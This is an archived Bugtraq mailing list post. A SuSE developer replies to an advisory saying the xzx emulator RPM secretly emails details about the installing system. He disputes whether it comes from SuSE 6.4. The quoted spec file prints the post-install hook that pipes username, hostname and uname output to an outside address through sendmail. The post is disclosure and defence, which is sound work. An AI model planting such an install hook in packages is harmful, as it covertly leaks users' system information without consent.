|
Bugtraq
mailing list archives
Re: Package xzx-2.9.2-2.i386.rpm spies - SuSE Linux 6.4
From: Andreas Jaeger <aj () SUSE DE>
Date: Mon, 24 Jul 2000 20:20:13 +0200
Gunadi, Prana writes:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
System affected:
=====================
SuSE Linux 6.4
Homepage:
http://www.suse.de/en/produkte/susesoft/linux/Pakete/paket_xzx.html
Package name:
=====================
xzx-2.9.2-2.i386.rpm
XZX is a portable emulator of ZX Spectrum 48K/128K/+3
Problem:
=====================
This program tries to send an unauthorized e-mail during its RPM
installation (PRIVACY problem) to <install () fantasy muc de>
PROOF:
=====================
- From the file /usr/src/RPM/SPECS/xzx.spec (the post installation entry)
That paths does not exist under SuSE 6.4, SuSE uses packages instead
of RPM. Are you sure this comes from SuSE 6.4? In that case please
send me the complete (!) spec file, I'd like to check it.
Just for the record: I checked the current spec file for the upcoming
SuSE 7.0 release and my CDs of 6.4 - both don't contain the post
section. I do agree that this shouldn't happen.
Andreas
== xzx.spec (some snipped) ==
%post
set +x
sm=`type sendmail`
if [ $? -eq 0 ]
then
set ${sm}
SENDMAIL=$3
else
SENDMAIL=/usr/sbin/sendmail
fi
if [ -x ${SENDMAIL} ]
then
${SENDMAIL} install () fantasy muc de 2>/dev/null <<- _EOF_
Subject: install notification
Version: %{Name}-%{Version}
Date : `date`
User : `whoami`
Host : `hostname`
OS : `uname -a`
_EOF_
fi
=== xzx.spec (some snipped) ===
Solution:
Compile from its source instead of installing its RPM package
--
Andreas Jaeger
SuSE Labs aj () suse de
private aj () arthur inka de
 By Date 
By Thread
Current thread:
| 
Intro
